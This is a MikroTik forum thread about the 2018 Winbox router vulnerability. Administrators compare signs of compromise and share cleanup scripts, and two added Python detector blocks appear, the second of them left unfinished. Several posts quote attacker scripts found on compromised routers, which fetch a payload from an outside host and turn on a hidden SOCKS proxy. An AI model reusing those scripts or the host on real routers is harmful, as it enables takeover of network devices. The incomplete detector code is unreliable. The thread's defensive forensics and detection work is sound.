Community discussions

 
BartoszP
Forum Guru
Posts: 1613
Joined: Mon Jun 16, 2014 1:13 pm
Location: Poland

Re: Winbox vulnerability: please upgrade

Sun Aug 05, 2018 9:20 am

43north ... you are using our forum ... you are posting ... why have you not upgraded your router earlier, even though you had (I suppose) knowledge of the problem?
Real admins use real keyboards.
 
43north
Member Candidate
Posts: 192
Joined: Fri Nov 14, 2014 7:06 am

Re: Winbox vulnerability: please upgrade

Sun Aug 05, 2018 9:42 am

43north ... you are using our forum ... you are posting ... why have you not upgraded your router earlier, even though you had (I suppose) knowledge of the problem?
Honestly I had never read the announcements section of the forum, I do now...... and will from here on out. My ignorance cost me, I know. Never again.

I appreciate any feedback anyone has in reference to my post.
 
BartoszP
Forum Guru
Posts: 1613
Joined: Mon Jun 16, 2014 1:13 pm
Location: Poland

Re: Winbox vulnerability: please upgrade

Sun Aug 05, 2018 9:59 am

Honestly I had never read the announcements section of the forum, I do now......
43north ... please do not take it personally :-) but this is the quotation of the month ... maybe even of the year.
 
43north
Member Candidate
Posts: 192
Joined: Fri Nov 14, 2014 7:06 am

Re: Winbox vulnerability: please upgrade

Sun Aug 05, 2018 10:09 am

Honestly I had never read the announcements section of the forum, I do now......
43north ... please do not take it personally :-) but this is the quotation of the month ... maybe even of the year.
I don't take it personally at all. It is my fault for not being more in tune. I own it 100%. Super frustrating. I appreciate the Mikrotik staff and what they do for us.

After reading some other posts I believe the steps that I took as I posted in this thread have mitigated any issues from the incident.
 
msatter
Forum Veteran
Posts: 901
Joined: Tue Feb 18, 2014 12:56 am
Location: Netherlands / Nīderlande

Re: Winbox vulnerability: please upgrade

Sun Aug 05, 2018 10:28 am

43north ... you are using our forum ... you are posting ... why have you not upgraded your router earlier, even though you had (I suppose) knowledge of the problem?
Honestly I had never read the announcements section of the forum, I do now...... and will from here on out. My ignorance cost me, I know. Never again.

I appreciate any feedback anyone has in reference to my post.

169,999 routers to go. So yours was not the only router that was taken over that easily.

I keep an eye on the active topics, which show all postings that are recent. The trouble is that important postings like vulnerability postings drop off as fast as the rest.
They are swiftly out of sight, and you will miss them if you don't check in several times a day.

Off quote but on topic: would this vulnerability have had the highest CVE rating of 10?
RB760iGS (hEX S) with the SFP being cooled.
Running:
RouterOS 6.44Beta17 / Winbox 3.18 / MikroTik APP 0.69
Cooling a SFP module: viewtopic.php?f=3&t=132258&p=671105#p671105
 
BartoszP
Forum Guru
Posts: 1613
Joined: Mon Jun 16, 2014 1:13 pm
Location: Poland

Re: Winbox vulnerability: please upgrade

Sun Aug 05, 2018 11:05 am

 
kobuki
Member Candidate
Posts: 123
Joined: Sat Apr 02, 2011 5:59 pm

Re: Winbox vulnerability: please upgrade

Sun Aug 05, 2018 1:09 pm

  • ...
  • Create Security mailing list (the Blog you created is a nice step forward, but this is useful for "post event summary" and maybe not exactly for urgent security advisories).
    ...
I think this one would be very useful. I for one am subscribed to multiple ones already, and do pay attention to what's announced there, since they always concisely describe the issues and give the CVE number(s) where one can see the in-depth details. MT issues regular product and update emails; this is at least as important, if not more so. It's not enough to list simple update bullets as usual; the email sent out on the 2nd was by far more effective because of its detailed contents and the warnings issued.
 
volkeu
just joined
Posts: 1
Joined: Sun Aug 05, 2018 11:27 am

Re: Winbox vulnerability: please upgrade

Sun Aug 05, 2018 1:10 pm

I made this to look for the common stuff. (Copy and paste into terminal.)
...
Open your log and look at the results. If you have a result with "!" you might have a problem.
That's not really usable, is it? Besides, you still need to fix it, and upgrade afterwards.
Methinks, better to check and fix at the same time:
# Firewall auto-fix - dangerous if you had disabled drop rules before infection (can't imagine why, though)
:if ([:len [/ip firewall filter find where action=drop disabled]] > 0) do={:put "Firewall drop rules were disabled"; /ip firewall filter enable [find action=drop]}
:if ([:len [/ip firewall filter find chain=input action=accept dst-port="8291"]] > 0) do={:put "Winbox had default firewall accept rule";/ip firewall filter remove [find chain=input action=accept dst-port="8291"]}
# Use this if you need to check firewall rules manually
:if ([:len [/ip firewall filter find where action=drop disabled]] > 0) do={:put "Disabled firewall drop rules:"; /ip firewall filter print where  action=drop disabled}
# Winbox
:if ([/ip service get winbox disabled] != true) do={:put "Winbox was enabled"; /ip service disable winbox}
# Socks
:if ([/ip socks get port] != 1080) do={:put "Socks Port was not 1080"; /ip socks set port=1080}
:if ([/ip socks get enabled] != false) do={:put "Socks was enabled"; /ip socks set enabled=no}
:if ([:len [/ip socks access find src-address~"95.154.216.128"]] > 0) do={:put "ip socks access had rule for 95.154.216.128"; /ip socks access remove [find src-address~"95.154.216.128"]}
# Script and scheduler
:if ([:len [/system script find source~"ikrotik.php"]] > 0) do={:put "Script containing \"ikrotik.php\" found"; :foreach s in=[/system script find source~"ikrotik.php"] do={/system scheduler remove [find on-event~[/system script get $s name]]}; /system script remove [find source~"ikrotik.php"]}
# File mikrotik.php
:if ([:len [/file find name="mikrotik.php"]] + [:len [/file find name="Mikrotik.php"]] > 0) do={ :put "File [Mm]ikrotik.php was found"; /file remove [find name="mikrotik.php"]; /file remove [find name="Mikrotik.php"];}
# User "service"
:if ([:len [/user find name="service"]] > 0) do={:put "User \"service\" existed"; /user remove [find name="service"]}
I even made a bash script, since I needed to fix several dozen routers.
https://pastebin.com/GAtA2mZa
 
msatter
Forum Veteran
Posts: 901
Joined: Tue Feb 18, 2014 12:56 am
Location: Netherlands / Nīderlande

Re: Winbox vulnerability: please upgrade

Sun Aug 05, 2018 1:22 pm

Of course I know where the announcements are located, I am not stupid.

I am calling for doing that bit extra to inform all and keep an important notice in the picture. Creating the notice in announcements and hoping all will go right from there is not working, as has been proven now.

Mikrotik has room to improve with the blog as well, and if we keep fighting each other like we are doing now, instead of thinking about how to improve the whole Mikrotik ecosystem,
it may lead to Mikrotik thinking we still support how they are doing things, as they have always done in the past, and so they keep sitting on the sideline.

If that happens, and it looks like that now, we will have the same discussion all over again in time.
 
CZFan
Forum Veteran
Posts: 999
Joined: Sun Oct 09, 2016 8:25 pm
Location: South Africa

Re: Winbox vulnerability: please upgrade

Sun Aug 05, 2018 2:26 pm

At least send a mail to the Mikrotik certified members
MTCNA, MTCTCE, MTCRE & MTCINE
 
BartoszP
Forum Guru
Posts: 1613
Joined: Mon Jun 16, 2014 1:13 pm
Location: Poland

Re: Winbox vulnerability: please upgrade

Sun Aug 05, 2018 2:34 pm

Mikrotik has room to improve with the blog as well...
Rhetorical question: Why do people need blogs, tweets or Facebook messages to feel well informed?
 
excession
just joined
Posts: 17
Joined: Mon May 11, 2015 8:16 pm

Re: Winbox vulnerability: please upgrade

Sun Aug 05, 2018 3:04 pm

That's it! THX!

In the scripts there is
/tool fetch address=95.154.216.163 port=2008 src-path=/mikrotik.php mode=http
Does anyone have the contents of the payload they can post? I've tried hitting the above but it's 404ing now.

Thanks
 
msatter
Forum Veteran
Posts: 901
Joined: Tue Feb 18, 2014 12:56 am
Location: Netherlands / Nīderlande

Re: Winbox vulnerability: please upgrade

Sun Aug 05, 2018 3:37 pm

Mikrotik has room to improve with the blog as well...
Rhetorical question: Why do people need blogs, tweets or Facebook messages to feel well informed?
Because Twitter and Facebook are not widely accepted ways to communicate. Facebook is evil and Twitter 'rate limits' me, so of the visits I make only 10% are successful views. This is not normal.

For me those two ways of communicating don't fly.

The blog is there to have a central, always accessible information source. It sits side by side with the forum, in which one can interact.
The blog is a one-way communication platform, so the information has to be complete and not redirect to other sites for further information. It has to be a single source.
 
gotsprings
Long time Member
Posts: 571
Joined: Mon May 14, 2012 9:30 pm

Re: Winbox vulnerability: please upgrade

Sun Aug 05, 2018 3:57 pm

I made this to look for the common stuff. (Copy and paste into terminal.)
...
Open your log and look at the results. If you have a result with "!" you might have a problem.
That's not really usable, is it? Besides, you still need to fix it, and upgrade afterwards.
Methinks, better to check and fix at the same time:
# Firewall auto-fix - dangerous if you had disabled drop rules before infection (can't imagine why, though)
:if ([:len [/ip firewall filter find where action=drop disabled]] > 0) do={:put "Firewall drop rules were disabled"; /ip firewall filter enable [find action=drop]}
:if ([:len [/ip firewall filter find chain=input action=accept dst-port="8291"]] > 0) do={:put "Winbox had default firewall accept rule";/ip firewall filter remove [find chain=input action=accept dst-port="8291"]}
# Use this if you need to check firewall rules manually
:if ([:len [/ip firewall filter find where action=drop disabled]] > 0) do={:put "Disabled firewall drop rules:"; /ip firewall filter print where  action=drop disabled}
# Winbox
:if ([/ip service get winbox disabled] != true) do={:put "Winbox was enabled"; /ip service disable winbox}
# Socks
:if ([/ip socks get port] != 1080) do={:put "Socks Port was not 1080"; /ip socks set port=1080}
:if ([/ip socks get enabled] != false) do={:put "Socks was enabled"; /ip socks set enabled=no}
:if ([:len [/ip socks access find src-address~"95.154.216.128"]] > 0) do={:put "ip socks access had rule for 95.154.216.128"; /ip socks access remove [find src-address~"95.154.216.128"]}
# Script and scheduler
:if ([:len [/system script find source~"ikrotik.php"]] > 0) do={:put "Script containing \"ikrotik.php\" found"; :foreach s in=[/system script find source~"ikrotik.php"] do={/system scheduler remove [find on-event~[/system script get $s name]]}; /system script remove [find source~"ikrotik.php"]}
# File mikrotik.php
:if ([:len [/file find name="mikrotik.php"]] + [:len [/file find name="Mikrotik.php"]] > 0) do={ :put "File [Mm]ikrotik.php was found"; /file remove [find name="mikrotik.php"]; /file remove [find name="Mikrotik.php"];}
# User "service"
:if ([:len [/user find name="service"]] > 0) do={:put "User \"service\" existed"; /user remove [find name="service"]}
I even made a bash script, since I needed to fix several dozen routers.
https://pastebin.com/GAtA2mZa
What I put up was to help you determine if you had "been hit". Since I don't know how everyone else in the world set up their routers... I WOULD NOT SCRIPT IN CHANGES. It was merely a "Use this to see if you have some of the common signs of this attack."

What I built for routers I configured removed and made changes based on me knowing what it was going to do to a system.

For instance... I have firewall drop rules that are enabled and disabled based on other input.
Example: If the main ISP is down and system is on cellular. Enable the drop rule on the forwarding of guest traffic.
Now one might argue turning off the accept rule from the guest network would have the same effect...
But placing this at the top of the forwarding chain and setting it to drop ANYTHING from source GuestSubnet will stop the traffic sooner. Especially if the detection script also flushed the connections.
That drop rule is also activated by scheduler as well.

So its pretty common for one of my routers to have several drop rules disabled under normal operations.

Also... shutting off winbox... that might be bad too.

How about adding a jump chain to blacklist an IP after several unsuccessful logins... Seems like a great idea too. But not knowing how someone else wrote their firewall...
Or
How about requiring port knocking for people to reach the router at all...
Or
Limiting IP scopes where admin access is available.

Those are all ways to go... but what I put up there was only meant to "look for signs". It's still up to the user to decide what to do about it.

And in your "script scheduler"
There are a few other additions I found. The most common entries I found across A LOT OF ROUTERS were
schedules named "a" and "schedule3_",
scripts named "ip" and "script3_"; I saw one instance of something like "script1". Of those scripts.... some did not contain mikrotik.php at all.
So keep that in mind when "looking for signs".
"It ain't what you don't know that gets you into trouble. It's what you know for sure that just ain't so."
Mark Twain
 
43north
Member Candidate
Posts: 192
Joined: Fri Nov 14, 2014 7:06 am

Re: Winbox vulnerability: please upgrade

Sun Aug 05, 2018 8:37 pm

That's it! THX!

In the scripts there is
/tool fetch address=95.154.216.163 port=2008 src-path=/mikrotik.php mode=http
Does anyone have the contents of the payload they can post? I've tried hitting the above but it's 404ing now.

Thanks
I grabbed the PHP file before fixing my router. I opened it with notepad and it was completely blank......
 
normis
MikroTik Support
Topic Author
Posts: 23509
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Winbox vulnerability: please upgrade

Mon Aug 06, 2018 8:30 am

It's disappointing that both the httpd vulnerability
We did fix and send on day one.
No answer to your question? How to write posts
 
msatter
Forum Veteran
Posts: 901
Joined: Tue Feb 18, 2014 12:56 am
Location: Netherlands / Nīderlande

Re: Winbox vulnerability: please upgrade

Mon Aug 06, 2018 9:43 am

It's disappointing that both the httpd vulnerability
We did fix and send on day one.
This is referring to this post: viewtopic.php?f=21&t=137572#p678156
 
rushlife
Frequent Visitor
Posts: 74
Joined: Thu Nov 05, 2015 12:30 pm
Location: czech republic

Re: Winbox vulnerability: please upgrade

Mon Aug 06, 2018 10:35 am

According to changelog it is fixed
What's new in 6.40.8 (2018-Apr-23 11:34):

!) winbox - fixed vulnerability that allowed to gain access to an unsecured router;
So why would they post this again if it was fixed in April?
Can you read?
 
msatter
Forum Veteran
Posts: 901
Joined: Tue Feb 18, 2014 12:56 am
Location: Netherlands / Nīderlande

Re: Winbox vulnerability: please upgrade

Mon Aug 06, 2018 11:14 am

According to changelog it is fixed
What's new in 6.40.8 (2018-Apr-23 11:34):

!) winbox - fixed vulnerability that allowed to gain access to an unsecured router;
So why would they post this again if it was fixed in April?
Can you read?

THEN, IS THIS CLEAR INFORMATION? "All versions from 6.29 (release date: 2015/28/05) to 6.42 (release date 2018/04/20) are vulnerable. Is your device affected?" and "...the same vulnerability in the RouterOS Winbox service, that was patched in RouterOS v6.42.1 in April 23, 2018."

To me this is also obsolete and confusing information; one needs to know what the status is on the second of August, and the rest is history. Give information about the current version required to not be vulnerable, and that has to be on top and repeated in the text. This required version can be even higher than the one from 2018/04/23.

The bugfix is on 6.40.8, also vulnerable if you look at the text above. However, the release date is 2018/04/23. This is confusing, and if you don't go and read the blog you would not know what the status of 6.40.8 is.

All those postings about 6.40.8 need not have been posted if only the TS had given complete and clear information.
 
normis
MikroTik Support
Topic Author
Posts: 23509
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Winbox vulnerability: please upgrade

Mon Aug 06, 2018 11:15 am

Well, the linked blog does include this information
Versions that include a fix: 6.40.8 [bugfix] or 6.42.1 [current] released on 25-mar-2018
We have added more details, so that it is more clear:

https://blog.mikrotik.com/security/winb ... ility.html
 
dada
Member Candidate
Posts: 243
Joined: Tue Feb 21, 2006 1:44 pm

Re: Winbox vulnerability: please upgrade

Mon Aug 06, 2018 11:42 am

We have added more details, so that it is more clear:

https://blog.mikrotik.com/security/winb ... ility.html
thanks, it is much more clear now. Except that the 6.28 version is vulnerable too. I am able to read usernames/passwords from boards with this version using winbox vulnerability exploit code...
Last edited by dada on Mon Aug 06, 2018 2:55 pm, edited 1 time in total.
 
DummyPLUG
newbie
Posts: 43
Joined: Wed Jan 03, 2018 10:17 am

Re: Winbox vulnerability: please upgrade

Mon Aug 06, 2018 12:43 pm

As others said, make a CVE for each vulnerability; it is easier to know if we are talking about the same thing.
For example, right now we know which winbox vulnerability we are talking about just because there is only one. If there is another one in the future, how can we know which one we are talking about? Winbox vulnerability 2017 & 20xx?
 
kobuki
Member Candidate
Posts: 123
Joined: Sat Apr 02, 2011 5:59 pm

Re: Winbox vulnerability: please upgrade

Mon Aug 06, 2018 12:46 pm

We have added more details, so that it is more clear:
https://blog.mikrotik.com/security/winb ... ility.html
It would be really useful to bump that post with today's date and tag with (UPDATED) or something.
 
msatter
Forum Veteran
Posts: 901
Joined: Tue Feb 18, 2014 12:56 am
Location: Netherlands / Nīderlande

Re: Winbox vulnerability: please upgrade

Mon Aug 06, 2018 1:30 pm

Well, the linked blog does include this information
Versions that include a fix: 6.40.8 [bugfix] or 6.42.1 [current] released on 25-mar-2018
We have added more details, so that it is more clear:

https://blog.mikrotik.com/security/winb ... ility.html
I did write that the blog did contain that information about 6.40.8, and it is much clearer now, which pleases me.

Don't distribute the information over different platforms without all of them having the same information.

I am not that harsh because I like to be so. I want Mikrotik to give their customers a better product experience and security.
 
msatter
Forum Veteran
Posts: 901
Joined: Tue Feb 18, 2014 12:56 am
Location: Netherlands / Nīderlande

Re: Winbox vulnerability: please upgrade

Mon Aug 06, 2018 3:56 pm

We have added more details, so that it is more clear:

https://blog.mikrotik.com/security/winb ... ility.html
thanks, it is much more clear now. Except that the 6.28 version is vulnerable too. I am able to read usernames/passwords from boards with this version using winbox vulnerability exploit code...
Please e-mail Mikrotik support with your findings at support@mikrotik.com so they can have a look into that. It will not have any impact on the advice about the minimal RouterOS version that has to be used.
 
msatter
Forum Veteran
Posts: 901
Joined: Tue Feb 18, 2014 12:56 am
Location: Netherlands / Nīderlande

Re: Winbox vulnerability: please upgrade

Mon Aug 06, 2018 3:57 pm

It looks like a CVE has been created, and I don't know enough to say whether it was done by the one who discovered this vulnerability or by Mikrotik itself. The CVE number is: CVE-2018-14847
 
normis
MikroTik Support
Topic Author
Posts: 23509
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Winbox vulnerability: please upgrade

Mon Aug 06, 2018 4:09 pm

CVE numbers don't have owners or publishers. Yes, you can use that CVE number to refer to this vulnerability. We will try to make numbers for any next vulnerability, if such would be discovered.
 
awacenter
Member Candidate
Posts: 192
Joined: Thu Dec 09, 2004 12:58 pm
Location: Castellón

Re: Winbox vulnerability: please upgrade

Mon Aug 06, 2018 5:52 pm

We detect these issues and we try to update and upgrade all Mikrotik devices.
Besides this, we block all source IPs via BGP when we can inform our ISP.
 
honzam
Forum Guru
Posts: 2129
Joined: Wed Feb 27, 2008 10:27 pm
Location: Czech Republic

Re: Winbox vulnerability: please upgrade

Mon Aug 06, 2018 8:17 pm

We will try to make numbers for any next vulnerability, if such would be discovered.
I hope no :)
LAN, FTTx, Wireless. ISP operator
 
BrianHiggins
Long time Member
Posts: 593
Joined: Mon Jan 16, 2006 6:07 am
Location: Norwalk, CT

Re: Winbox vulnerability: please upgrade

Mon Aug 06, 2018 9:56 pm

Is there any more detailed information than the old blog post? I've seen numerous routers running 6.40.8 bugfix get compromised in the last few days. Winbox was externally accessible. On Friday I updated a couple of older routers that had not yet been compromised and weren't on 6.40.8 to 6.40.8, only to find those routers compromised today. I've now updated nearly everything to 6.42.6 current and restricted 8291 to only the range of external IPs that need access, and so far I haven't seen any re-compromised routers.


Changes I've found in compromised routers

/system logging action
memory-lines set to 1

/ip socks
enabled, port set, connection timeout changed, max connections increased

/ip firewall filter
input chain tcp allow rule to match socks port
drop rules disabled on all chains

/system scripts
one or more scripts added
first script seen calls tool fetch to download files
second script seen makes all changes seen above except memory-lines=1, unclear when / how that's set

/system scheduler
one or more schedules added to call scripts mentioned

/user
add service user account

Other users I've spoken with report finding an empty mikrotik.php text file in /file, though I didn't encounter that myself.

One interesting thing I noted was that the only routers I found compromised were also routers running additional services or with NAT rules exposing services. I'm guessing they didn't scan for 8291, they instead scanned for something else to build the list of IPs to target. every single router that was otherwise locked down without any services beside 8291 exposed regardless of build number remained uncompromised. Might just be a coincidence, but was worth noting.

EDIT, added sample of scripts found on one of the routers.
/system script
add name=script4_ owner=service policy=ftp,reboot,read,write,policy,test,password,sensitive source=\
    "/tool fetch address=95.154.216.167 port=2008 src-path=/mikrotik.php mode=http keep-result=no"
add name="port 39593" owner=admin policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon source="/ip firewall filter remove [/ip firewall filter find where comment ~ \"port [0-9]*\"];/ip socks set enabled=yes port=39593 max-connections=255 connection-idle-timeout=60;/ip socks access remove [/ip socks access find];/ip firewall filter add chain=input protocol=tcp port=39593 action=accept comment=\"port 39593\";/ip firewall filter move [/ip firewall filter find comment=\"port 39593\"] 1;"
-Brian

http://www.aditumims.com
Complete web based ISP in-a-box solution, designed specifically for Multi-Tenant properties, works great for WISPs too.
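Both indicator lists above (gotsprings: schedules named "a" and "schedule3_", scripts named "ip" and "script3_" that do not necessarily contain mikrotik.php; BrianHiggins: memory-lines=1, SOCKS enabled, an input accept rule for the SOCKS port, disabled drop rules, fetch scripts, a "service" user) can be checked read-only against a `/export` dump, which is closer to the "look for signs, don't script in changes" approach gotsprings argued for than an auto-fix script. The following Python is an added example, not code from either post or from MikroTik: it parses the export format (including the backslash-wrapped long lines) and reports findings without touching the router. The sample export is constructed from values quoted in the thread; the generic `scriptN_`/`scheduleN_` name pattern and the payload keyword regex are assumptions.

```python
import re

# Indicator values quoted in this thread (script/scheduler names reported by
# gotsprings, payload and config changes reported by BrianHiggins).  The generic
# name pattern and the keyword regex are assumptions made for this example.
SUSPICIOUS_NAMES = {"a", "ip", "script1", "script3_", "schedule3_"}
GENERIC_NAME_RE = re.compile(r"^(script|schedule)\d+_?$")
PAYLOAD_RE = re.compile(r"/tool fetch|mikrotik\.php|/ip socks set", re.IGNORECASE)

# key=value tokens of an export line; quoted values may contain spaces and \" escapes
TOKEN_RE = re.compile(r'([\w.-]+)=("(?:[^"\\]|\\.)*"|\S+)')


def parse_export(text):
    """Parse a RouterOS `/export` dump into (section, verb, params) triples."""
    entries, section, pending = [], None, ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.endswith("\\"):            # export wraps long lines with a trailing backslash
            pending += line[:-1]
            continue
        line, pending = pending + line, ""
        if line.startswith("/"):           # section header such as "/ip firewall filter"
            section = line
            continue
        verb, _, rest = line.partition(" ")
        params = {}
        for key, val in TOKEN_RE.findall(rest):
            if val.startswith('"'):
                val = val[1:-1].replace('\\"', '"')
            params[key] = val
        entries.append((section, verb, params))
    return entries


def scan(entries):
    """Return (category, detail) findings; nothing here modifies the router."""
    findings = []
    in_section = lambda sec: [p for s, _, p in entries if s == sec]

    for p in in_section("/system logging action"):
        if p.get("memory-lines") == "1":
            findings.append(("logging", "memory log buffer reduced to 1 line"))

    socks_port = None
    for p in in_section("/ip socks"):
        if p.get("enabled") == "yes":
            socks_port = p.get("port")
            findings.append(("socks", f"SOCKS proxy enabled on port {socks_port}"))

    for p in in_section("/ip firewall filter"):
        if p.get("action") == "drop" and p.get("disabled") == "yes":
            findings.append(("firewall", f"disabled drop rule in chain {p.get('chain')}: {p.get('comment', '')}"))
        if (p.get("chain") == "input" and p.get("action") == "accept"
                and socks_port and socks_port in (p.get("port"), p.get("dst-port"))):
            findings.append(("firewall", f"input accept rule for SOCKS port {socks_port}"))

    flagged_scripts = set()
    for p in in_section("/system script"):
        name, reasons = p.get("name", ""), []
        if name in SUSPICIOUS_NAMES or GENERIC_NAME_RE.match(name):
            reasons.append("suspicious name")
        if p.get("owner") == "service":
            reasons.append("owned by 'service'")
        if PAYLOAD_RE.search(p.get("source", "")):
            reasons.append("payload-like source")
        if reasons:
            flagged_scripts.add(name)
            findings.append(("script", f"{name}: " + ", ".join(reasons)))

    for p in in_section("/system scheduler"):
        name, target = p.get("name", ""), p.get("on-event", "")
        if name in SUSPICIOUS_NAMES or GENERIC_NAME_RE.match(name) or target in flagged_scripts:
            findings.append(("scheduler", f"{name} runs {target}"))

    for p in in_section("/user"):
        if p.get("name") == "service":
            findings.append(("user", "account 'service' present"))
    return findings


def scan_export(text):
    return scan(parse_export(text))


# Constructed sample export, assembled from the values quoted in the thread.
SAMPLE_EXPORT = r'''
# aug/06/2018 21:30:00 by RouterOS 6.40.8
/ip firewall filter
add action=accept chain=input comment="port 39593" port=39593 protocol=tcp
add action=accept chain=input comment="allow established" connection-state=established,related
add action=drop chain=input comment="drop all else" disabled=yes
add action=drop chain=forward comment="drop invalid" connection-state=invalid disabled=yes
/ip socks
set connection-idle-timeout=1m enabled=yes max-connections=255 port=39593
/system logging action
set 0 memory-lines=1
/system scheduler
add interval=1m name=schedule3_ on-event=script3_ policy=\
    ftp,reboot,read,write,policy,test,password,sensitive start-time=startup
add interval=1d name=a on-event=ip policy=read,write,test start-time=startup
add interval=1d name=backup on-event=nightly-backup policy=read,write start-time=03:00:00
/system script
add name=script3_ owner=service policy=ftp,reboot,read,write,policy,test,password,sensitive source=\
    "/tool fetch address=95.154.216.167 port=2008 src-path=/mikrotik.php mode=http keep-result=no"
add name=ip owner=admin policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon source=\
    "/ip socks set enabled=yes port=39593 max-connections=255 connection-idle-timeout=60;"
add name=nightly-backup owner=admin policy=read,write,test source="/system backup save name=nightly"
/user
add group=full name=service
add group=full name=admin
'''

if __name__ == "__main__":
    for category, detail in scan_export(SAMPLE_EXPORT):
        print(f"[{category}] {detail}")
```

Feed it the output of `/export` (or `/export verbose`) saved from each router; the scheduler check also catches a scheduler whose name is innocent but whose on-event points at a flagged script, which is the case gotsprings warned about where the script body no longer mentions mikrotik.php.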
 
tippenring
Member Candidate
Posts: 150
Joined: Thu Oct 02, 2014 8:54 pm
Location: St Louis MO

Re: Winbox vulnerability: please upgrade

Mon Aug 06, 2018 10:48 pm

Is there anymore detailed information than the old blog post? I've seen numerous routers running 6.40.8 bugfix get compromised in the last few days. Winbox was externally accessible. On Friday I updated a couple older routers that had not yet been compromised that weren't on 6.40.8 to 6.40.8, only too find those routers compromised today.
The conclusion that your routers were not compromised prior to the upgrade to 6.40.8 is invalid. The correct conclusion is that there was no *apparent* indication of compromise. I'll bet you didn't change the admin passwords when you upgraded to 6.40.8. Is that correct? Assuming no password change, someone connected to your router some time ago and downloaded the admin credentials. They only recently logged in and changed your configuration.
I've now updated nearly everything to 6.42.6 current and restricted 8291 to only the range of external IPs that need access, and so far I haven't seen any re-compromised routers.
Restricting admin access to only known good source IPs is a good practice. You could also look at port knocking if you need more flexibility.
 
gotsprings
Long time Member
Posts: 571
Joined: Mon May 14, 2012 9:30 pm

Re: Winbox vulnerability: please upgrade

Tue Aug 07, 2018 12:27 am

Is there anymore detailed information than the old blog post? I've seen numerous routers running 6.40.8 bugfix get compromised in the last few days. Winbox was externally accessible. On Friday I updated a couple older routers that had not yet been compromised that weren't on 6.40.8 to 6.40.8, only too find those routers compromised today.
The conclusion that your routers were not compromised prior to the upgrade to 6.40.8 is invalid. The correct conclusion is that there was no *apparent* indication of compromise. I'll bet you didn't change the admin passwords when you upgraded to 6.40.8. Is that correct? Assuming no password change, someone connected to your router some time ago and downloaded the admin credentials. They only recently logged in and changed your configuration.
I've now updated nearly everything to 6.42.6 current and restricted 8291 to only the range of external IPs that need access, and so far I haven't seen any re-compromised routers.
Restricting admin access to only known good source IPs is a good practice. You could also look at port knocking if you need more flexibility.
I looked over the log of another installers router.

[admin@MikroTik] /log> print
jul/06 21:10:09 system,info verified routeros-arm-6.42.5.npk
jul/06 21:10:09 system,info installed routeros-arm-6.42.5

jul/16 12:00:50 system,info,account user admin logged in from 194.40.240.254 via winbox
jul/16 12:00:53 system,info,account user admin logged in from 194.40.240.254 via telnet
jul/16 12:00:54 system,info socks config changed by admin
jul/16 12:00:55 system,info filter rule added by admin
jul/16 12:00:55 system,info filter rule moved by admin
jul/16 12:00:56 system,info,account user admin logged out from 194.40.240.254 via winbox
jul/16 12:00:56 system,info,account user admin logged out from 194.40.240.254 via telnet

jul/24 21:58:07 system,info,account user admin logged in from 185.153.198.228 via winbox
jul/24 21:58:10 system,info,account user admin logged in from 185.153.198.228 via telnet
jul/24 21:58:11 system,info user service added by admin
jul/24 21:58:11 system,info filter rule removed by admin
jul/24 21:58:12 system,info socks config changed by admin
jul/24 21:58:13 system,info filter rule added by admin
jul/24 21:58:13 system,info filter rule moved by admin
jul/24 21:58:14 system,info,account user admin logged out from 185.153.198.228 via winbox
jul/24 21:58:14 system,info,account user admin logged out from 185.153.198.228 via telnet

When they updated they didn't change the password.
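The log above shows the pattern the thread is describing: a login via winbox, a second one via telnet a few seconds later, a burst of socks/filter/user changes, and logout, all from an address no admin uses, and all after the router had already been upgraded to 6.42.5 on jul/06. The following Python is an added example, not code from the post: it groups RouterOS `/log print` lines into admin sessions, attaches the "... by admin" change lines to the session that was open, and flags sessions that made sensitive changes from outside an allowlist of trusted admin networks. The log lines are copied from the post above plus one constructed benign session from 192.0.2.10; the allowlist 192.0.2.0/24, the year 2018 (RouterOS log lines carry no year) and the keyword list are assumptions.

```python
import ipaddress
import re
from datetime import datetime

LINE_RE = re.compile(r"^(?P<mon>[a-z]{3})/(?P<day>\d{2}) (?P<time>\d{2}:\d{2}:\d{2}) (?P<topics>\S+) (?P<msg>.*)$")
LOGIN_RE = re.compile(r"^user (\S+) logged (in|out) from (\S+) via (\w+)$")
CHANGE_RE = re.compile(r"^(.+) by (\S+)$")
MONTHS = {m: i for i, m in enumerate("jan feb mar apr may jun jul aug sep oct nov dec".split(), 1)}
# change messages worth attention (assumption; extend for your own environment)
SENSITIVE = ("socks", "filter rule", "user ", "script", "scheduler", "logging")


def parse_sessions(log_text, year=2018):
    """Group login/logout lines into admin sessions and attach config changes to them."""
    sessions, open_by_key = [], {}
    for raw in log_text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue
        ts = datetime.strptime(f"{year}-{MONTHS[m['mon']]:02d}-{m['day']} {m['time']}", "%Y-%m-%d %H:%M:%S")
        topics, msg = m["topics"].split(","), m["msg"]
        lm = LOGIN_RE.match(msg)
        if "account" in topics and lm:
            user, direction, ip, via = lm.groups()
            key = (user, ip)
            if direction == "in":
                s = open_by_key.get(key)
                if s is None:
                    s = open_by_key[key] = {"user": user, "ip": ip, "start": ts, "end": ts,
                                           "via": [], "changes": [], "open": 0}
                    sessions.append(s)
                s["via"].append(via)          # winbox and telnet logins share one session
                s["open"] += 1
            elif key in open_by_key:
                s = open_by_key[key]
                s["end"], s["open"] = ts, s["open"] - 1
                if s["open"] == 0:
                    del open_by_key[key]
            continue
        cm = CHANGE_RE.match(msg)
        if cm and topics[:2] == ["system", "info"]:
            what, who = cm.groups()
            # attribute the change to the newest still-open session of that user
            for s in reversed(sessions):
                if s["user"] == who and s["open"] > 0:
                    s["changes"].append(what)
                    s["end"] = ts
                    break
    return sessions


def flag_sessions(sessions, trusted_nets, max_seconds=30):
    """Flag sessions that made sensitive changes from outside the trusted admin networks."""
    nets = [ipaddress.ip_network(n) for n in trusted_nets]
    flagged = []
    for s in sessions:
        addr = ipaddress.ip_address(s["ip"])
        trusted = any(addr in n for n in nets)
        sensitive = [c for c in s["changes"] if any(k in c for k in SENSITIVE)]
        # two transports and a burst of changes within seconds looks like a tool, not a person
        scripted = len(set(s["via"])) > 1 and (s["end"] - s["start"]).total_seconds() <= max_seconds
        if sensitive and not trusted:
            flagged.append(dict(s, trusted=trusted, scripted=scripted, sensitive=sensitive))
    return flagged


# Lines from the post above, plus one constructed benign admin session from 192.0.2.10.
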